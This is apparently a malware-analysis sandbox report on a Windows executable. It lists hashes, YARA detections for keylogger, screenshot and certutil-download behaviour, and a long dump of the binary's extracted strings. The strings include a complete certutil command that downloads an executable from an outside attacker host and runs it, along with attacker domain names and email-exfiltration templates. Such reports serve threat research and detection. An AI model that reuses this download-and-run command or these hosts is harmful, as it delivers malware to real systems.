Sample details: 40f389f9831210976746f2ef6cfc6c25

Hashes
MD5: 40f389f9831210976746f2ef6cfc6c25
SHA1: 9b48e42db9ccb47091ecc514755328f08c4c9c4e
SHA256: d29aa1c873c01cd6b2da98937efc3bb567f9bd08dc400697e3df7b999895579c
SSDEEP: 3072:58qPv4wHDK8vA9BFk/PBOzERcJR5lfrlwYoarBUaotJYtg0Mu3jY+EL3Y8HOS6U:WqPv48NvCkEgC5fok7g+8H+
Details
File Type: PE32
Added: 2019-05-29 17:22:19
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/without_images | YRP/without_attachments | YRP/with_urls | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/network_http | YRP/screenshot | YRP/keylogger | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/Certutil_Decode_OR_Download
Parent Files
02cbdf7d741381ea32dde2dfd5844652
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
RPWWWj
t'9|$pt
t@_^]3
D$,WPQR
L$<RPQ
D$XQRP
BRPj+S
@PVj,S
\$4t|Ht@H
T$ QRP
O h0wD
F$@;F(v
F$@@;F(v
QQSVWj
QQSVWd
t.;t$$t(
uRFGHt
tn<%t2
HHtiHtGH
HtHHt(
HtOHt)H
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
VC20XC00U
HHtpHHtl
sO;>|C;~
"WWShx
PPPPPPPP
QQSVWj
>:uNFV
>:u#FV
PPPPPPPP
PPPPPPPP
VWuBh4
HSVHWtgHHtF
+ttHHtd
t/WWUPj
QQSVW3
nt2Ht#Ht
QSUVWj
n0SSSSU
_SSSSU
Ph_^][Y
tD9_Pt?
(wqt\HHtS
t>Ht Ht
hWj@_;
tBSh5eA
t	9p$u
tBSh5eA
^$_^[]
F(_+F$^[;E
tBSh5eA
tBSh5eA
<A|2<Z
<A|@<Z
VWtp9E
HtTHtFHt8Ht*Ht
PWVWWW
SVWhyyA
9^0u/j
F09^4u*j
F49^8u&j
^,_^][
CWinApp
PreviewPages
Settings
CWinThread
CCmdTarget
CNotSupportedException
CMemoryException
CException
UNLINK
DELETE
CObject
CStringArray
combobox
software
CTempGdiObject
CTempDC
CGdiObject
CUserException
CResourceException
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
InitCommonControlsEx
COMCTL32.DLL
CPtrList
CMapPtrToPtr
CSyncObject
CCriticalSection
CArchiveException
CTempMenu
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
_hypot
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#SNAN
CreateDirectoryA
MoveFileA
GetProcessHeap
GetModuleHandleA
ExitProcess
HeapAlloc
HeapReAlloc
HeapFree
IsBadReadPtr
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetStartupInfoA
GetModuleFileNameA
GetTickCount
FindClose
FindNextFileA
DeleteFileA
RemoveDirectoryA
FindFirstFileA
GetCommandLineA
KERNEL32.DLL
MessageBoxA
wsprintfA
DispatchMessageA
TranslateMessage
GetMessageA
PeekMessageA
USER32.dll
GetObjectA
GetStockObject
GDI32.dll
LEAUT32.dll
PathFileExistsA
SHLWAPI.dll
lstrlenA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetVersionExA
GetLastError
GetCurrentProcess
MultiByteToWideChar
WideCharToMultiByte
GetTimeZoneInformation
SetLastError
GetCurrentThreadId
GetCurrentThread
lstrcmpiA
lstrcmpA
GlobalDeleteAtom
GlobalAlloc
GlobalLock
InterlockedIncrement
InterlockedDecrement
GlobalUnlock
FreeLibrary
LocalFree
lstrcpynA
EnterCriticalSection
lstrcpyA
LocalAlloc
LoadLibraryA
InitializeCriticalSection
DeleteCriticalSection
LeaveCriticalSection
SetFilePointer
FlushFileBuffers
GetProcAddress
TlsAlloc
GlobalFree
GlobalHandle
TlsFree
GlobalReAlloc
TlsSetValue
LocalReAlloc
TlsGetValue
GlobalFlags
WritePrivateProfileStringA
lstrcatA
GlobalFindAtomA
GlobalAddAtomA
GlobalGetAtomNameA
GetVersion
GetProcessVersion
SetErrorMode
GetCPInfo
GetOEMCP
RtlUnwind
TerminateProcess
RaiseException
GetSystemTime
GetLocalTime
GetACP
HeapSize
SetStdHandle
GetFileType
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
LCMapStringA
LCMapStringW
SetUnhandledExceptionFilter
GetStringTypeA
GetStringTypeW
IsBadCodePtr
CompareStringA
CompareStringW
SetEnvironmentVariableA
EnableWindow
GetParent
IsWindowEnabled
GetForegroundWindow
GetActiveWindow
SetForegroundWindow
SetWindowTextA
PostQuitMessage
PostMessageA
SendMessageA
SetCursor
GetWindowLongA
GetLastActivePopup
SetWindowsHookExA
GetCursorPos
IsWindowVisible
ValidateRect
CallNextHookEx
GetKeyState
GetNextDlgTabItem
GetFocus
EnableMenuItem
CheckMenuItem
SetMenuItemBitmaps
ModifyMenuA
GetMenuState
LoadBitmapA
GetMenuCheckMarkDimensions
GetWindowTextA
GetSystemMetrics
GetClassNameA
PtInRect
GetWindowRect
GetDlgCtrlID
GetWindow
ClientToScreen
UnhookWindowsHookEx
GetMenuItemCount
ReleaseDC
TabbedTextOutA
DrawTextA
GrayStringA
GetDlgItem
SetWindowLongA
SetWindowPos
ShowWindow
SetFocus
GetWindowPlacement
IsIconic
SystemParametersInfoA
RegisterWindowMessageA
GetMessagePos
GetMessageTime
DefWindowProcA
RemovePropA
CallWindowProcA
GetPropA
SetPropA
GetClassLongA
CreateWindowExA
DestroyWindow
GetMenuItemID
GetSubMenu
GetMenu
RegisterClassA
GetClassInfoA
WinHelpA
GetCapture
GetTopWindow
CopyRect
GetClientRect
AdjustWindowRectEx
GetSysColor
MapWindowPoints
LoadIconA
LoadCursorA
GetSysColorBrush
LoadStringA
DestroyMenu
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
le32.dll
RasGetConnectStatusA
RasHangUpA
RASAPI32.dll
CreateBitmap
DeleteObject
DeleteDC
SaveDC
RestoreDC
SelectObject
SetBkColor
SetTextColor
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
GetClipBox
GetDeviceCaps
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
COMCTL32.dll
WSOCK32.dll
InternetOpenA
InternetCloseHandle
InternetSetOptionA
InternetConnectA
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
UnregisterClassA
WebKitSdk\2.7.62\
WebKitSdk\
ophgsf.exe
!This program cannot be run in DOS mode.
`.rdata
@.data
MFC42.DLL
__CxxFrameHandler
memcpy
_CxxThrowException
memset
MSVCRT.dll
__dllonexit
_onexit
??1type_info@@UAE@XZ
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CloseHandle
WriteFile
CreateFileA
GetProcAddress
LoadLibraryA
HeapAlloc
HeapReAlloc
GetProcessHeap
VirtualFree
FreeLibrary
VirtualAlloc
IsBadReadPtr
ExitProcess
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
EnableWindow
GetClassNameA
GetWindow
SetFocus
GetWindowLongA
USER32.dll
CreateHatchBrush
GDI32.dll
_stricmp
_setmbcp
CChildFrame
CMainFrame
NHOWHYM
[YLLOJ
))+$'s
))+$'s
.m4..v\+
+.++m5
+$'s96
E4m7.P
s/*+.s
7+++'V
+7+'Vp
+7+'VQ
!!+$mu
.+++++mu
.$$$$$mu
......$.
.m5n.mmB
!.'+mu
!.'+mu
$....V
6J766E
$$$$$mu
D$+'{U
+$'VVZ
J"6JG6J
$QHJEYR4HUU
$QHJEYR9RRO[
1LJUHRO[SUZ5F[VYLWU
RKJH[NA9
2O[YR4HUU
2O[YR+Q@U
2O[YR9RRO[
RKJHRUL9
7UJ*Q[S;OELJ
RKJH[YJ9
'HQJU4QRU
;HUYJU4QRU9
7UJ2O[YR*QMU
7UJ.HO[9ZZHUKK
2OYZ2QXHYHA9
4HUU2QXHYHA
.HO[UKK
.HO[UKK
;HUYJU*OORVURN
+LYNKVOJ
;ROKU6YLZRU
7UJ;EHHULJ.HO[UKK
7UJ-OZERU6YLZRU9
7ROXYR-UMOHA+JYJEK5F
7UJ$UHKQOL5F9
+UJ4QRU9JJHQXEJUK9
7UJ-OZERU4QRU,YMU9
7UJ2YKJ5HHOH
;ONA4QRU9
7UJ+AKJUM:QHU[JOHA9
6UYN9RRO[
7UJ.HO[UKK6UYN
$QHJEYR.HOJU[J
6UYN4HUU
+UJ5DULJ
'YQJ4OH+QLWRU/XPU[J
;HUYJU5DULJ9
RKJH[MNQ9
35(,52
GKNHQLJT9
;ROKU5DULJ2OW
;RUYH5DULJ2OW9
/NUL5DULJ2OW9
:URUJU+UHDQ[U
/NUL+UHDQ[U9
/NUL+;-YLYWUH9
+UJ+UHDQ[U+JYJEK
(UWQKJUH+UHDQ[U;JHR6YLZRUH9
+JYHJ+UHDQ[U;JHR:QKNYJ[VUH9
(UW;ROKU3UA
(UW+UJ$YREU5F9
(UW/NUL3UA5F9
;ROKU+UHDQ[U6YLZRU
(UW/NUL3UA9
+JYHJ+UHDQ[U9
%LRO[S+UHDQ[U:YJYXYKU
;VYLWU+UHDQ[U;OLTQW
2O[S+UHDQ[U:YJYXYKU
;HUYJU+UHDQ[U9
9:$9.1
>!9&.9&> 
MUM[NA
__;FF4HYMU6YLZRUH
MUMKUJ
>!9.9&1> 
MUM[MN
_;FF*VHOG5F[UNJQOL
KJHKJH
KJH[NA
KJHL[NA
KJHRUL
KJHH[VH
KJH[KNL
KJH[YJ
KJHL[MN
_UF[UNJ_VYLZRUH
HUYRRO[
_XUWQLJVHUYZUF
KJH[VH
-+$;(*
??	JANU_QLTO>>%95>& 
__ZRROLUFQJ
_OLUFQJ
_QLQJJUHM
MYRRO[
_YZPEKJ_TZQD
:QKYXRU*VHUYZ2QXHYHA;YRRK
_KJHENH
_KJHQ[MN
:RR-YQL
+VURRUF
9RRO[YJU
XETTUH
.REWQL-U
/NUL.HOFA
;ROKU.HOFA
+U+VEJZOGL.HQDQRUWU
+AKJUM
+U[EHQJA
9NNRQ[YJQOL
(UMYHS
+!+*5-";EHHULJ;OLJHOR+UJ"+UHDQ[UK"
'QL+JY
":UTYERJ
K"KVURR"ONUL"[OMMYLZ
9NNRQ[YJQOLK"QUFNROHU
UFU"KVURR"ONUL"[OMMYLZ
1LKJYRR*QMU
35(,52
7UJ*Q[S;OELJ
+AK4HUU+JHQLW
/RUYEJ
;O;HUYJU1LKJYL[U
;O%LQLQJQYRQ@U
;O1LQJQYRQ@U
(ELJQMU8HOSUHK
69(:'9(5":5+;(1.*1/,"+AKJUM";ULJHYR.HO[UKKOH"
'*+7UJ9[JQDU;OLKORU+UKKQOL1Z
SUHLUR
.HO[UKK
(JR7UJ,J$UHKQOL,EMXUHK
,DK8Y[SULKK
+/4*'9(5"-Q[HOKOTJ"'QLZOGK";EHHULJ$UHKQOL"(EL
:UK[HQNJQOL
+!+*5-";EHHULJ;OLJHOR+UJ"+UHDQ[UK"
1K8YZ(UYZ.JH
GQLQLUJ
;HUYJU.HO[UKK9K%KUH9
+UJ*OSUL1LTOHMYJQOL
:ENRQ[YJU*OSUL5F
/NUL.HO[UKK*OSUL
:URUJU+UHDQ[U
;VYLWU+UHDQ[U;OLTQW
;HUYJU+UHDQ[U9
;OLJHOR+UHDQ[U
)EUHA+UHDQ[U+JYJEK
;ROKU+UHDQ[U6YLZRU
+JYHJ+UHDQ[U9
/NUL+UHDQ[U9
/NUL+;-YLYWUH9
(UWQKJUH+UHDQ[U;JHR6YLZRUH9
+UJ+UHDQ[U+JYJEK
9:$9.1
WUJVOKJLYMU
WUJKO[SLYMU
KURU[J
'+91O[JR
KUJKO[SONJ
[ROKUKO[SUJ
[OLLU[J
WUJVOKJXALYMU
KO[SUJ
'+9;RUYLEN
'+9+JYHJEN
KJHKJH
MUMKUJ
MUM[NA
KJHRUL
KJH[MN
-+$;(*
5LEM'QLZOGK
+ULZ-UKKYWU9
1K'QLZOG$QKQXRU
-UKKYWU8OF9
5FQJ'QLZOGK5F
GKNHQLJT9
7UJ;EHHULJ.HO[UKK
-ODU4QRU5F9
-ODU4QRU9
7UJ+AKJUM:QHU[JOHA9
7UJ+AKJUM1LTO
5FNYLZ5LDQHOLMULJ+JHQLWK9
7UJ5FQJ;OZU.HO[UKK
7UJ$UHKQOL5F9
*UHMQLYJU*VHUYZ
+UJ5DULJ
;YL[UR1O
(UKUJ5DULJ
;HUYJU5DULJ9
7UJ4QRU9JJHQXEJUK9
'YQJ4OH+QLWRU/XPU[J
RKJH[YJ9
;ROKU6YLZRU
7UJ2YKJ5HHOH
(URUYKU-EJUF
;HUYJU-EJUF9
7UJ-OZERU4QRU,YMU9
;HUYJU.HO[UKK9
7UJ;EHHULJ*VHUYZ1Z
;ROKU:UKSJON
+UJ*VHUYZ:UKSJON
7UJ%KUH/XPU[J1LTOHMYJQOL9
7UJ*VHUYZ:UKSJON
/NUL:UKSJON9
1LJUHLUJ;ROKU6YLZRU
1LJUHLUJ(UYZ4QRU
1LJUHLUJ/NUL%HR9
1LJUHLUJ/NUL9
2OOSEN.HQDQRUWU$YREU9
9ZPEKJ*OSUL.HQDQRUWUK
.HO[UKK
.HO[UKK
;HUYJU*OORVURN
+LYNKVOJ
(UW;ROKU3UA
(UW5LEM3UA5F9
(UW5LEM$YREU9
(UW/NUL3UA5F9
(UW)EUHA$YREU5F9
(UW:URUJU$YREU9
(UW:URUJU3UA9
(UW+UJ$YREU5F9
(UW;HUYJU3UA5F9
?9$JANU_QLTO>>
=>=5=^=S=}=
?>?!?V?O?q?j?c?
=<=7=,= =_=U=R=~=
<><4<2<)<!<[<M<G<y<m<a<
?9?7?,?#?U?S?B?x?q?
	C	z	h	
=4=+=^=M=@=w=j=
<=<6<&<V<F<v<f<
?6?&?V?F?v?f?
	6	V	@	t	d	
=$="=X=O=B=
~	n	j	f	
Shellex
haq.hognoob.se
Rstuvw
Rstuvw Yabcdefg Ijklmnop Rstu
Rstuvwxy Bcdefghij Lmnopqr Tuvwxyab Def
Default
HeapFree
kernel32.dll
HeapFree
KERNEL32.dll
VirtualFree
kernel32.dll
VirtualProtect
kernel32.dll
Local AppWizard-Generated Applications
CWzdDoc
CWzdView
.?AVtype_info@@
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwtGwwwwwwwwwwwwwwwtDDDDw
wwGtwDwwwwwtDDDDw
pwwwwppwwww
wwGttwGwwwwt
33330wp3
wwGttwGwwwwt
wwtDtwGwp
33330p333333
wwwttDwwp
wwwwpppwww
wwp0wwww
wwp0wwww
OGp888888
wwp0wwww
wwwppwwwp
p0wwww
DDGwp8
wwwwwwww
p0wwww
wwwwwwpwppp0wwww
wwwwwww
wwwwwww
wwwwwp
Secloginler.exe
http://fid.hognoob.se/Secloginler.exe
cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/Secloginler.exe %SystemRoot%\Temp\Secloginler.exe & %SystemRoot%\Temp\Secloginler.exe
\....\
\....\TemporaryFile
\TemporaryFile
kernel32.dll
CreateDirectoryA
MoveFileA
program internal error number is %d. 
:%d,%d(
blackmoon
BlackMoon RunTime Error:
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.PAVCException@@
Accept: */*
Accept: */* 
HTTP/1.0
gb2312
us-ascii
=?gb2312?B?
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%s <%s>
Content-Transfer-Encoding: base64
MIME-Version: 1.0
Content-type: text/plain; charset="
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
From: %s
To: %s
Cc: %s
Subject: %s
Date: %s
%a, %d %b %Y %H:%M:%S 
%+.2d%.2d
.?AVCNoTrackObject@@
.?AV_AFX_WIN_STATE@@
.?AVCObject@@
.?AVCCmdTarget@@
.?AVCWinThread@@
.?AVCWinApp@@
.PAVCException@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVCCmdUI@@
.?AV_AFX_SOCK_STATE@@
.?AVCWnd@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCSyncObject@@
.?AVCCriticalSection@@
.?AVCMapPtrToPtr@@
.?AVCSessionMapPtrToPtr@@
.?AVCStringArray@@
.PAVCArchiveException@@
.?AUCThreadData@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCDC@@
.?AVCGdiObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVCTestCmdUI@@
.?AVCTempWnd@@
.?AVCHandleMap@@
.?AVCPtrList@@
.?AVCArchiveException@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVtype_info@@